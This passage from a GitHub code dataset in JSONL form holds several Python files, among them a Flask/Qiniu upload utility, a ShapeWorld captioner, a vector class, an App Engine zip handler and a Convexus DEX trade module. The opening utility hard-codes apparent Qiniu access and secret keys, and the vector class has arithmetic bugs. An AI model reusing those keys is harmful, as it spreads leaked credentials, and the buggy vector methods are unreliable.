'3kN7t5PKDJAKhdjZVSHhh7gOq8-Tuf9bc9mUYklE'\n secret_key = 'cAH0zVZQOfGfoQSa7AXPiAL7GN9JfxgqD5yeZOAZ'\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n # 要上传的空间\n bucket_name = 'zj-test-flask'\n # 初始化BucketManager\n bucket = BucketManager(q)\n # key就是要删除的文件的名字\n key = filename\n ret, info = bucket.delete(bucket_name, key)\n return info\n\n# 这个用不上,已经在钩子函数中拿到文章分类和用户对象,并赋值给g对象,渲染模板时可以直接取到g对象中的数据\ndef user_type():\n # 获取文章分类\n types = Article_type.query.all()\n # 登录用户\n user = None\n user_id = session.get('uid', None)\n if user_id:\n user = User.query.get(user_id)\n return user, types","repo_name":"zoker777/flaskBlog","sub_path":"apps/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10991953891","text":"from shapeworld import CaptionRealizer\nfrom shapeworld.world import World\n\n\nclass WorldCaptioner(object):\n\n MAX_ATTEMPTS = 10\n statistics_header = None\n\n def __init__(self, realizer=None, quantifier_tolerance=None):\n if realizer is None:\n realizer = CaptionRealizer.from_name(name=(realizer or 'dmrs'))\n assert isinstance(realizer, CaptionRealizer)\n self.realizer = realizer\n self.quantifier_tolerance = quantifier_tolerance if quantifier_tolerance is not None else 0.1\n self.statistics_filehandle = None\n\n def __call__(self, world, correct, mode=None):\n assert isinstance(world, dict) or isinstance(world, World)\n assert isinstance(correct, bool)\n assert mode in (None, 'train', 'test', 'validation')\n if isinstance(world, World):\n world = world.model()\n if mode is None:\n captioner = self.caption_world\n elif mode == 'train':\n captioner = self.caption_train_world\n elif mode == 'test':\n captioner = self.caption_test_world\n elif mode == 'validation':\n captioner = self.caption_validation_world\n for _ in range(WorldCaptioner.MAX_ATTEMPTS):\n caption = captioner(world, correct)\n if caption is not None:\n return caption\n return None\n\n def caption_world(self, world, correct):\n raise NotImplementedError\n\n def caption_train_world(self, world, correct):\n return self.caption_world(world, correct)\n\n def caption_validation_world(self, world, correct):\n return self.caption_world(world, correct)\n\n def caption_test_world(self, world, correct):\n return self.caption_world(world, correct)\n\n def realize(self, captions):\n return self.realizer.realize(captions=captions)\n\n def collect_statistics(self, filehandle, append=False):\n assert filehandle is not None\n self.statistics_filehandle = filehandle\n if not append and self.__class__.statistics_header:\n self.statistics_filehandle.write(self.__class__.statistics_header + '\\n')\n\n def close_statistics(self):\n if self.statistics_filehandle is not None:\n self.statistics_filehandle.close()\n\n def report(self, *instance):\n if self.statistics_filehandle is not None:\n self.statistics_filehandle.write(','.join(str(value) for value in instance) + '\\n')\n","repo_name":"codeaudit/ShapeWorld","sub_path":"shapeworld/captioner.py","file_name":"captioner.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"11674474138","text":"import collections\nimport Tkinter as TK\nimport math\nimport os\n\n\ndef path(filename):\n\tfilepath = os.path.realpath(__file__)\n\tdirpath = os.path.dirname(filepath)\n\tfullpath = os.path.join(dirpath,filename)\n\treturn fullpath\n\n\ndef line(a, b, x, y):\n\timport turtle\n\tturtle.up()\n\tturtle.goto(a, b)\n\tturtle.down()\n\tturtle.goto(x, y)\n\n\nclass vector(collections.Sequence):\n # pylint: disable=invalid-name\n\tPRECISION = 6\n\t\n\t__slots__ = ('_x', '_y', '_hash')\n\n\n\tdef __init__(self, x, y):\n\t\tself._hash = None\n\t\tself._x = round(x, self.PRECISION)\n\t\tself._y = round(y, self.PRECISION)\n\n\n\t@property\n\t#getter\n\tdef x(self):\n\t\treturn self._x\n\n\t@x.setter\n\tdef x(self, value):\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot set x after hashinhg\")\n\t\tself._x = round(value, self.PRECISION)\n\n\n\t@property\n\tdef y(self):\n\t\treturn self._y\n\t\n\t@y.setter\n\tdef y(self, value):\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot set y after hashinhg\")\n\t\tself._y = round(value, self.PRECISION)\n\n\n\n\tdef __hash__(self):\n\t\t#v.__hash__() -> hash(v)\n\t\t#v = vector(1, 2)\n\n\t\tif self._hash is None:\n\t\t\tpair = (self.x, self.y)\n\t\t\tself._hash = hash(pair)\n\n\t\treturn self._hash\n\n\n\tdef __len__(self):\n\t\treturn 2\n\n\n\tdef __getitem__(self, index):\n\t\tif index == 0:\n\t\t\treturn self.x\n\t\telif index == 1:\n\t\t\treturn self.y\n\t\telse:\n\t\t\traise IndexError\n\n\n\tdef copy(self):\n\t\ttype_self = type(self)\n\t\treturn type_self(self.x, self.y)\n\n\n\tdef __eq__(self, other):\n\t\t#v = w if v = vector(1, 2) = w = vector(1, 2)\n\n\t\tif isinstance(other, vector):\n\t\t\treturn self.x == other.x and self.y == other.y\n\n\t\treturn NotImplemented\n\n\n\tdef __ne__(self, other):\n\t\tif isinstance(other, vector):\n\t\t\treturn self.x != other.x and self.y != other.y\n\n\t\treturn NotImplemented\n\n\n\tdef __iadd__(self, other):\n\t\t#v.__iadd__(w) -> v += w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot add vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x = other.x\n\t\t\tself.y = other.y\n\t\telse:\n\t\t\tself.x += other\n\t\t\tself.y += other\n\t\treturn self\n\n\n\tdef __add__(self, other):\n\t\t#v.__iadd__(w) -> v + w\t\t\n\t\tcopy = self.copy()\n\t\treturn copy.__iadd__(other)\n\n\n\t__radd__ = __add__\n\n\tdef move(self, other):\n\t\t#move vector by other(n place)\n\t\t#v = vector(1, 2) w = vector(3, 4) v.move(w) c ==> vector(4, 6)\n\t\tself.__iadd__(other)\n\n\n\tdef __isub__(self, other):\n\t\t#v.__isub__(w) -> v -= w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot subtract vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x -= other.x\n\t\t\tself.y -= other.y\n\t\telse:\n\t\t\tself.x -= other\n\t\t\tself.y -= other\n\n\n\tdef __sub__(self, other):\n\t\t#v.__sub__(w) -> v-w\n\t\tcopy = self.copy()\n\t\treturn copy.__isub__(other)\n\n\n\tdef __imul__(self, other):\n\t\t#v.__imul__(w) => v*= w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot multiply vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x *= other.x\n\t\t\tself.y *= other.y\n\t\telse:\n\t\t\tself.x *= other\n\t\t\tself.y *= other\n\t\treturn self\n\n\n\tdef __mul__(self, other):\n\t\t#v.__mul__(w) => v * w\n\t\tcopy = self.copy.__imul__()\n\t\treturn copy.__imul__(other)\n\t\t\n\t__rmul__ = __mul__\n\t\n\n\tdef scale(self, other):\n\t\tself.__imul__(other)\n\n\n\tdef __itruediv__(self, other):\n\t\t#v.__itruediv__(w) => v /= w\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot divide vector after hashinhg\")\n\t\telif isinstance(other, vector):\n\t\t\tself.x /= other.x\n\t\t\tself.y /= other.y\n\t\telse:\n\t\t\tself.x /= other\n\t\t\tself.y /= other\n\t\treturn self\n\n\n\tdef __truediv__(self, other):\n\t\t#v.__truediv__(w) => v / w\n\t\tcopy = self.copy()\n\t\treturn copy.__itruediv__(other)\n\n\n\tdef __neg__(self):\n\t\t#v__neg__() => -v\n\t\tcopy = self.copy()\n\t\tcopy.x = -copy.x\n\t\tcopy.y = -copy.y\n\t\treturn copy\n\n\n\tdef __abs__(self):\n\t\t#vector(3, 4) => 5\n\t\treturn (self.x**2 + self.y**2)**0.5\n\n\n\tdef rotate(self, angle):\n\t\tif self._hash is not None:\n\t\t\traise ValueError(\"Cannot rotate vector after hashinhg\")\n\t\tradians = angle * math.pi/180.0\n\t\tcosine = math.cos(radians)\n\t\tsine = math.sin(radians)\n\n\n\t\tx = self.x\n\t\ty = self.y\n\n\t\tself.x = x * cosine - y * sine\n\t\tself.y = y * cosine + x * sine\n\n\n\tdef __repr__(self):\n\t\t#v.__repr__() => repr(v)\n\t\ttype_self = type(self)\n\t\tname = type_self.__name__\n\t\treturn '{}({!r},{!r})'.format(name, self.x, self.y)\n\n\t","repo_name":"NemoIII/gamepy","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11420435924","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\nCreated on Jan 21, 2011\r\n\r\n@author: krizan\r\n'''\r\nfrom StringIO import StringIO\r\nfrom base64 import encode\r\nfrom data.model import Files, Email\r\nfrom google.appengine.ext import webapp\r\nimport base64\r\nimport logging\r\nimport zipfile\r\n\r\nclass DownloadZipFile(webapp.RequestHandler):\r\n def get(self, emailid):\r\n logging.info('downloading zip file for email: ' + emailid)\r\n emailid = str(emailid).strip()\r\n if emailid and emailid != '':\r\n email = Email.get(emailid)\r\n if email:\r\n logging.info('email attachments count: ' + str(len(email.attachments)))\r\n \r\n # create the zip stream\r\n zipstream=StringIO()\r\n zfile = zipfile.ZipFile(zipstream,\"w\")\r\n\r\n for attachment in email.attachments:\r\n file_attachment = Files.get(attachment)\r\n if file_attachment:\r\n zfile = self.addFile(zfile, file_attachment.name, file_attachment.content)\r\n \r\n zfile.close()\r\n zipstream.seek(0)\r\n \r\n self.response.headers['Content-Type'] = 'application/zip'\r\n self.response.headers['Content-Disposition'] = 'attachment; filename=\"attachments.zip\"'\r\n #self.response.out.write(zfile.content)\r\n while True:\r\n buf = zipstream.read(2048)\r\n if buf == \"\":\r\n break\r\n self.response.out.write(buf)\r\n \r\n def addFile(self, zipstream, fname, content):\r\n # store the contents in a stream\r\n f = StringIO(content)\r\n f.seek(0)\r\n \r\n logging.info(\"adding file [\" + fname + \"] with size f.len : \" + str(f.len/1024) + \"kb\")\r\n \r\n # write the contents to the zip file\r\n #zipstream.writestr(fname, content)\r\n #zipstream.writestr(fname.decode(\"utf-8\"), f.getvalue())\r\n zipstream.writestr(fname.encode('ascii'), f.getvalue())\r\n return zipstream\r\n","repo_name":"dejans11/my-gfeed","sub_path":"src/download_zip.py","file_name":"download_zip.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"34629680764","text":"import time\ndef timer(func):\n def func_wrapper(*arg, **kwargs):\n t0 = time.time()\n print('begin to run function \"{}\"'.format(func.__name__))\n result = func(*arg, **kwargs)\n t1 = time.time()\n t_diff = t1 - t0\n msg = 'finish function \"{}\", time used: {}m, {}s'\n print(msg.format(func.__name__, t_diff // 60, t_diff % 60))\n return result\n\n return func_wrapper","repo_name":"xiaoshijian/HM_COMPETITION","sub_path":"toolbox/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13301181696","text":"from collections import Counter\nimport string\n\nclass Solution:\n def customSortString(self, S: str, T: str) -> str:\n letter_count = Counter(T)\n other_letters = set(string.ascii_lowercase) - set(S)\n order = S + ''.join(other_letters)\n result = []\n\n for letter in order:\n result.extend([letter * letter_count[letter]])\n return ''.join(result)\n\nsol = Solution()\nS = \"cba\"\nT = \"abcd\"\nprint(sol.customSortString(S, T))","repo_name":"adalloul0928/Leetcode_Hell","sub_path":"Archive/Facebook/Other/customSortString.py","file_name":"customSortString.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5142594692","text":"from functools import reduce\nfrom typing import List, cast\nfrom dataclasses import dataclass\n\nfrom convexus.sdkcore.constants import TradeType\nfrom convexus.sdkcore.utils.sortedInsert import sortedInsert\nfrom convexus.sdkcore.entities.errors import InsufficientInputAmountError\nfrom convexus.sdkcore.entities.fractions.fraction import Fraction\nfrom convexus.sdkcore.entities.fractions.price import Price\nfrom convexus.sdkcore.entities.fractions.percent import Percent\nfrom convexus.sdkcore.entities.fractions.currencyAmount import CurrencyAmount\nfrom convexus.sdkcore.entities.currency import Currency\nfrom convexus.sdk.entities.factoryProvider import PoolFactoryProvider\n\nfrom convexus.sdk.entities.route import Route\nfrom convexus.sdk.entities.pool import Pool\n\ndef tradeComparator (\n a: 'Trade',\n b: 'Trade'\n) -> int:\n \"\"\"\n * Trades comparator, an extension of the input output comparator that also considers other dimensions of the trade in ranking them\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The trade type, either exact input or exact output\n * @param a The first trade to compare\n * @param b The second trade to compare\n * @returns A sorted ordering for two neighboring elements in a trade array\n \"\"\"\n # must have same input and output token for comparison\n assert a.inputAmount.currency.equals(b.inputAmount.currency), 'INPUT_CURRENCY'\n assert a.outputAmount.currency.equals(b.outputAmount.currency), 'OUTPUT_CURRENCY'\n\n if (a.outputAmount.equalTo(b.outputAmount)):\n if (a.inputAmount.equalTo(b.inputAmount)):\n # consider the number of hops since each hop costs gas\n aHops = reduce(lambda total, cur: total + len(cur.route.tokenPath), a.swaps, 0)\n bHops = reduce(lambda total, cur: total + len(cur.route.tokenPath), b.swaps, 0)\n return aHops - bHops\n\n # trade A requires less input than trade B, so A should come first\n if (a.inputAmount.lessThan(b.inputAmount)):\n return -1\n else:\n return 1\n else:\n # tradeA has less output than trade B, so should come second\n if (a.outputAmount.lessThan(b.outputAmount)):\n return 1\n else:\n return -1\n\n@dataclass\nclass BestTradeOptions:\n # how many results to return\n maxNumResults: int = 3\n # the maximum number of hops a trade should contain\n maxHops: int = 3\n\n@dataclass\nclass RouteInfo:\n route: Route\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n\n@dataclass\nclass TradeConstructorArgs:\n routes: List[RouteInfo]\n tradeType: TradeType\n\n@dataclass\nclass RouteAmount:\n route: Route\n amount: CurrencyAmount\n\n@dataclass\nclass UncheckedTradeConstructorArguments:\n route: Route\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n tradeType: TradeType\n\nclass Trade:\n \"\"\"\n * Represents a trade executed against a set of routes where some percentage of the input is\n * split across each route.\n *\n * Each route has its own set of pools. Pools can not be re-used across routes.\n *\n * Does not account for slippage, i.e., changes in price environment that can occur between\n * the time the trade is submitted and when it is executed.\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The trade type, either exact input or exact output\n \"\"\"\n \n def __init__(self, args: TradeConstructorArgs):\n \"\"\"\n * Construct a trade by passing in the pre-computed property values\n * @param routes The routes through which the trade occurs\n * @param tradeType The type of trade, exact input or exact output\n \"\"\"\n routes: List[RouteInfo] = args.routes\n tradeType: TradeType = args.tradeType\n\n inputCurrency = routes[0].inputAmount.currency\n outputCurrency = routes[0].outputAmount.currency\n\n assert all(map(lambda routeInfo: inputCurrency.wrapped.equals(routeInfo.route.input.wrapped), routes)), 'INPUT_CURRENCY_MATCH'\n assert all(map(lambda routeInfo: outputCurrency.wrapped.equals(routeInfo.route.output.wrapped), routes)), 'OUTPUT_CURRENCY_MATCH'\n\n \"\"\"\n * The swaps of the trade, i.e. which routes and how much is swapped in each that\n * make up the trade.\n \"\"\"\n self.swaps: List[RouteInfo] = routes\n\n \"\"\"\n * The type of the trade, either exact in or exact out.\n \"\"\"\n self.tradeType: TradeType = tradeType\n\n \"\"\"\n * The cached result of the input amount computation\n * @private\n \"\"\"\n self.__inputAmount: CurrencyAmount | None = None\n \n \"\"\"\n * The cached result of the output amount computation\n * @private\n \"\"\"\n self.__outputAmount: CurrencyAmount | None = None\n \n \"\"\"\n * The cached result of the computed execution price\n * @private\n \"\"\"\n self.__executionPrice: Price | None = None\n \n \"\"\"\n * The cached result of the price impact computation\n * @private\n \"\"\"\n self.__priceImpact: Percent | None = None\n\n def __repr__(self) -> str:\n return str(self.__dict__)\n\n @property\n def route(self) -> Route:\n \"\"\"\n * @deprecated Deprecated in favor of 'swaps' property. If the trade consists of multiple routes\n * this will return an error.\n *\n * When the trade consists of just a single route, this returns the route of the trade,\n * i.e. which pools the trade goes through.\n \"\"\"\n assert len(self.swaps) == 1, 'MULTIPLE_ROUTES'\n return self.swaps[0].route\n\n @property\n def inputAmount(self) -> CurrencyAmount:\n \"\"\"\n * The input amount for the trade assuming no slippage.\n \"\"\"\n if self.__inputAmount:\n return self.__inputAmount\n\n inputCurrency = self.swaps[0].inputAmount.currency\n totalInputFromRoutes = reduce (lambda total, cur:\n total.add(cur),\n map(lambda swap: swap.inputAmount, self.swaps),\n CurrencyAmount.fromRawAmount(inputCurrency, 0)\n )\n\n self.__inputAmount = totalInputFromRoutes\n return self.__inputAmount\n\n @property\n def outputAmount(self) -> CurrencyAmount:\n \"\"\"\n * The output amount for the trade assuming no slippage.\n \"\"\"\n if (self.__outputAmount):\n return self.__outputAmount\n\n outputCurrency = self.swaps[0].outputAmount.currency\n totalOutputFromRoutes = reduce(lambda total, cur:\n total.add(cur),\n map(lambda swap: swap.outputAmount, self.swaps),\n CurrencyAmount.fromRawAmount(outputCurrency, 0)\n )\n\n self.__outputAmount = totalOutputFromRoutes\n return self.__outputAmount\n\n @property\n def executionPrice(self) -> Price:\n \"\"\"\n * The price expressed in terms of output amount/input amount.\n \"\"\"\n if not self.__executionPrice:\n self.__executionPrice = Price (\n self.inputAmount.currency,\n self.outputAmount.currency,\n self.inputAmount.quotient,\n self.outputAmount.quotient\n )\n return cast(Price, self.__executionPrice)\n\n @property\n def priceImpact(self) -> Percent:\n \"\"\"\n * Returns the percent difference between the route's mid price and the price impact\n \"\"\"\n if (self.__priceImpact):\n return self.__priceImpact\n\n spotOutputAmount = CurrencyAmount.fromRawAmount(self.outputAmount.currency, 0)\n for swap in self.swaps:\n midPrice = swap.route.midPrice\n spotOutputAmount = spotOutputAmount.add(midPrice.quote(swap.inputAmount))\n\n priceImpact = spotOutputAmount.subtract(self.outputAmount).divide(spotOutputAmount)\n self.__priceImpact = Percent(priceImpact.numerator, priceImpact.denominator)\n return self.__priceImpact\n\n @staticmethod\n def exactIn (\n poolFactoryProvider: PoolFactoryProvider,\n route: Route,\n amountIn: CurrencyAmount\n ) -> 'Trade':\n \"\"\"\n * Constructs an exact in trade with the given amount in and route\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @param factoryProvider A Convexus Pool Factory provider\n * @param route The route of the exact in trade\n * @param amountIn The amount being passed in\n * @returns The exact in trade\n \"\"\"\n return Trade.fromRoute(poolFactoryProvider, route, amountIn, TradeType.EXACT_INPUT)\n\n @staticmethod\n def exactOut (\n poolFactoryProvider: PoolFactoryProvider,\n route: Route,\n amountOut: CurrencyAmount\n ) -> 'Trade':\n \"\"\"\n * Constructs an exact out trade with the given amount out and route\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @param route The route of the exact out trade\n * @param amountOut The amount returned by the trade\n * @returns The exact out trade\n \"\"\"\n return Trade.fromRoute(poolFactoryProvider, route, amountOut, TradeType.EXACT_OUTPUT)\n\n @staticmethod\n def fromRoute (\n poolFactoryProvider: PoolFactoryProvider,\n route: Route,\n amount: CurrencyAmount,\n tradeType: TradeType\n ) -> 'Trade':\n \"\"\"\n * Constructs a trade by simulating swaps through the given route\n * @template Currency The input token, either ICX or an IRC-2.\n * @template Currency The output token, either ICX or an IRC-2.\n * @template TradeType The type of the trade, either exact in or exact out.\n * @param route route to swap through\n * @param amount the amount specified, either input or output, depending on tradeType\n * @param tradeType whether the trade is an exact input or exact output swap\n * @returns The route\n \"\"\"\n amounts: List[CurrencyAmount] = [None] * len(route.tokenPath)\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n\n if (tradeType == TradeType.EXACT_INPUT):\n assert amount.currency.equals(route.input), 'INPUT'\n amounts[0] = amount.wrapped\n for i in range(len(route.tokenPath) - 1):\n pool = route.pools[i]\n outputAmount, _ = pool.getOutputAmount(amounts[i])\n amounts[i + 1] = outputAmount\n\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amount.numerator, amount.denominator)\n outputAmount = CurrencyAmount.fromFractionalAmount(\n route.output,\n amounts[len(amounts) - 1].numerator,\n amounts[len(amounts) - 1].denominator\n )\n else:\n assert amount.currency.equals(route.output), 'OUTPUT'\n amounts[len(amounts) - 1] = amount.wrapped\n for i in range(len(route.tokenPath) - 1, 0, -1):\n pool = route.pools[i - 1]\n inputAmount, _ = pool.getInputAmount(amounts[i])\n amounts[i - 1] = inputAmount\n\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amounts[0].numerator, amounts[0].denominator)\n outputAmount = CurrencyAmount.fromFractionalAmount(route.output, amount.numerator, amount.denominator)\n\n trade = Trade(TradeConstructorArgs(\n routes=[RouteInfo(route=route, inputAmount=inputAmount, outputAmount=outputAmount)],\n tradeType=tradeType\n ))\n\n trade.checkRoute(poolFactoryProvider)\n\n return trade\n\n @staticmethod\n def fromRoutes (\n poolFactoryProvider: PoolFactoryProvider,\n routes: List[RouteAmount],\n tradeType: TradeType\n ) -> 'Trade':\n \"\"\"\n * Constructs a trade from routes by simulating swaps\n *\n * @template Currency The input token, either ICX or an IRC-2.\n * @template Currency The output token, either ICX or an IRC-2.\n * @template TradeType The type of the trade, either exact in or exact out.\n * @param routes the routes to swap through and how much of the amount should be routed through each\n * @param tradeType whether the trade is an exact input or exact output swap\n * @returns The trade\n \"\"\"\n populatedRoutes: List[RouteInfo] = []\n\n for routeAmount in routes:\n amount = routeAmount.amount\n route = routeAmount.route\n amounts: List[CurrencyAmount] = [None] * len(route.tokenPath)\n inputAmount: CurrencyAmount\n outputAmount: CurrencyAmount\n\n if (tradeType == TradeType.EXACT_INPUT):\n assert amount.currency.equals(route.input), 'INPUT'\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amount.numerator, amount.denominator)\n amounts[0] = CurrencyAmount.fromFractionalAmount(route.input.wrapped, amount.numerator, amount.denominator)\n\n for i in range(len(route.tokenPath) - 1):\n pool = route.pools[i]\n outputAmount, pool = pool.getOutputAmount(amounts[i])\n amounts[i + 1] = outputAmount\n\n outputAmount = CurrencyAmount.fromFractionalAmount(\n route.output,\n amounts[len(amounts) - 1].numerator,\n amounts[len(amounts) - 1].denominator\n )\n else:\n assert amount.currency.equals(route.output), 'OUTPUT'\n outputAmount = CurrencyAmount.fromFractionalAmount(route.output, amount.numerator, amount.denominator)\n amounts[len(amounts) - 1] = CurrencyAmount.fromFractionalAmount(\n route.output.wrapped,\n amount.numerator,\n amount.denominator\n )\n\n for i in range(len(route.tokenPath) - 1, 0, -1):\n pool = route.pools[i - 1]\n inputAmount, pool = pool.getInputAmount(amounts[i])\n amounts[i - 1] = inputAmount\n\n inputAmount = CurrencyAmount.fromFractionalAmount(route.input, amounts[0].numerator, amounts[0].denominator)\n\n populatedRoutes.append(RouteInfo(route, inputAmount, outputAmount))\n\n trade = Trade(TradeConstructorArgs(\n populatedRoutes,\n tradeType\n ))\n\n trade.checkRoute(poolFactoryProvider)\n return trade\n\n @staticmethod\n def createUncheckedTrade (\n poolFactoryProvider: PoolFactoryProvider,\n constructorArguments: UncheckedTradeConstructorArguments\n ) -> 'Trade':\n \"\"\"\n * Creates a trade without computing the result of swapping through the route. Useful when you have simulated the trade\n * elsewhere and do not have any tick data\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The type of the trade, either exact in or exact out\n * @param constructorArguments The arguments passed to the trade constructor\n * @returns The unchecked trade\n \"\"\"\n trade = Trade(TradeConstructorArgs(\n routes = [RouteInfo (\n inputAmount=constructorArguments.inputAmount,\n outputAmount=constructorArguments.outputAmount,\n route=constructorArguments.route\n )],\n tradeType=constructorArguments.tradeType\n ))\n\n trade.checkRoute(poolFactoryProvider)\n return trade\n\n @staticmethod\n def createUncheckedTradeWithMultipleRoutes (\n poolFactoryProvider: PoolFactoryProvider,\n constructorArguments: TradeConstructorArgs\n ) -> 'Trade':\n \"\"\"\n * Creates a trade without computing the result of swapping through the routes. Useful when you have simulated the trade\n * elsewhere and do not have any tick data\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The type of the trade, either exact in or exact out\n * @param constructorArguments The arguments passed to the trade constructor\n * @returns The unchecked trade\n \"\"\"\n trade = Trade(constructorArguments)\n trade.checkRoute(poolFactoryProvider)\n return trade\n\n def checkRoute (\n self,\n poolFactoryProvider: PoolFactoryProvider\n ):\n \"\"\"\n * Need to be called after the constructor to check for the route uniqueness\n * @param factoryProvider A Factory Provider\n * @param routes The routes through which the trade occurs\n \"\"\"\n numPools = reduce(lambda total, cur:\n total + cur,\n map(lambda swap: len(swap.route.pools), self.swaps),\n 0)\n\n poolAddressSet = set()\n for swap in self.swaps:\n route = swap.route\n for pool in route.pools:\n poolAddressSet.add(Pool.getAddress(poolFactoryProvider, pool.token0, pool.token1, pool.fee))\n\n assert numPools == len(poolAddressSet), 'POOLS_DUPLICATED'\n\n def minimumAmountOut (self, slippageTolerance: Percent, amountOut: CurrencyAmount = None) -> CurrencyAmount:\n \"\"\"\n * Get the minimum amount that must be received from this trade for the given slippage tolerance\n * @param slippageTolerance The tolerance of unfavorable slippage from the execution price of this trade\n * @returns The amount out\n \"\"\"\n if not amountOut:\n amountOut = self.outputAmount\n\n assert not slippageTolerance.lessThan(0), 'SLIPPAGE_TOLERANCE'\n\n if (self.tradeType == TradeType.EXACT_OUTPUT):\n return amountOut\n else:\n slippageAdjustedAmountOut = Fraction(1).add(slippageTolerance).invert().multiply(amountOut.quotient).quotient\n return CurrencyAmount.fromRawAmount(amountOut.currency, slippageAdjustedAmountOut)\n\n def maximumAmountIn (self, slippageTolerance: Percent, amountIn: CurrencyAmount = None) -> CurrencyAmount:\n \"\"\"\n * Get the maximum amount in that can be spent via this trade for the given slippage tolerance\n * @param slippageTolerance The tolerance of unfavorable slippage from the execution price of this trade\n * @returns The amount in\n \"\"\"\n if amountIn is None:\n amountIn = self.inputAmount\n\n assert not slippageTolerance.lessThan(0), 'SLIPPAGE_TOLERANCE'\n\n if (self.tradeType == TradeType.EXACT_INPUT):\n return amountIn\n else:\n slippageAdjustedAmountIn = Fraction(1).add(slippageTolerance).multiply(amountIn.quotient).quotient\n return CurrencyAmount.fromRawAmount(amountIn.currency, slippageAdjustedAmountIn)\n\n def worstExecutionPrice(self, slippageTolerance: Percent) -> Price:\n \"\"\"\n * Return the execution price after accounting for slippage tolerance\n * @param slippageTolerance the allowed tolerated slippage\n * @returns The execution price\n \"\"\"\n return Price (\n self.inputAmount.currency,\n self.outputAmount.currency,\n self.maximumAmountIn(slippageTolerance).quotient,\n self.minimumAmountOut(slippageTolerance).quotient\n )\n\n @staticmethod\n def bestTradeExactIn (\n poolFactoryProvider: PoolFactoryProvider,\n pools: List[Pool],\n currencyAmountIn: CurrencyAmount,\n currencyOut: Currency,\n options: BestTradeOptions = BestTradeOptions(3, 3),\n # used in recursion.\n currentPools: List[Pool] = None,\n nextAmountIn: CurrencyAmount = None,\n bestTrades: List['Trade'] = None\n ) -> List['Trade']:\n \"\"\"\n * Given a list of pools, and a fixed amount in, returns the top `maxNumResults` trades that go from an input token\n * amount to an output token, making at most `maxHops` hops.\n * Note this does not consider aggregation, as routes are linear. It's possible a better route exists by splitting\n * the amount in among multiple routes.\n * @param pools the pools to consider in finding the best trade\n * @param nextAmountIn exact amount of input currency to spend\n * @param currencyOut the desired currency out\n * @param maxNumResults maximum number of results to return\n * @param maxHops maximum number of hops a returned trade can make, e.g. 1 hop goes through a single pool\n * @param currentPools used in recursion; the current list of pools\n * @param currencyAmountIn used in recursion; the original value of the currencyAmountIn parameter\n * @param bestTrades used in recursion; the current list of best trades\n * @returns The exact in trade\n \"\"\"\n if nextAmountIn is None:\n nextAmountIn = currencyAmountIn\n if currentPools is None:\n currentPools = []\n if bestTrades is None:\n bestTrades = []\n\n maxNumResults = options.maxNumResults\n maxHops = options.maxHops\n\n assert len(pools) > 0, 'POOLS'\n assert maxHops > 0, 'MAX_HOPS'\n assert currencyAmountIn == nextAmountIn or len(currentPools) > 0, 'INVALID_RECURSION'\n\n amountIn = nextAmountIn.wrapped\n tokenOut = currencyOut.wrapped\n for i in range(len(pools)):\n pool = pools[i]\n # pool irrelevant\n if (not pool.token0.equals(amountIn.currency) and not pool.token1.equals(amountIn.currency)):\n continue\n\n amountOut: CurrencyAmount\n try:\n amountOut, _ = pool.getOutputAmount(amountIn)\n except InsufficientInputAmountError as error:\n # input too low\n if (error.isInsufficientInputAmountError):\n continue\n raise error\n\n # we have arrived at the output token, so this is the final trade of one of the paths\n if (amountOut.currency.isToken and amountOut.currency.equals(tokenOut)):\n sortedInsert (\n bestTrades,\n Trade.fromRoute(\n poolFactoryProvider,\n Route(currentPools + [pool], currencyAmountIn.currency, currencyOut),\n currencyAmountIn,\n TradeType.EXACT_INPUT\n ),\n maxNumResults,\n tradeComparator\n )\n elif (maxHops > 1 and len(pools) > 1):\n poolsExcludingThisPool = pools[0:i] + pools[i + 1: len(pools)]\n\n # otherwise, consider all the other paths that lead from this token as long as we have not exceeded maxHops\n Trade.bestTradeExactIn (\n poolFactoryProvider,\n poolsExcludingThisPool,\n currencyAmountIn,\n currencyOut,\n BestTradeOptions (\n maxNumResults,\n maxHops - 1\n ),\n currentPools + [pool],\n amountOut,\n bestTrades\n )\n\n return bestTrades\n\n @staticmethod\n def bestTradeExactOut (\n poolFactoryProvider: 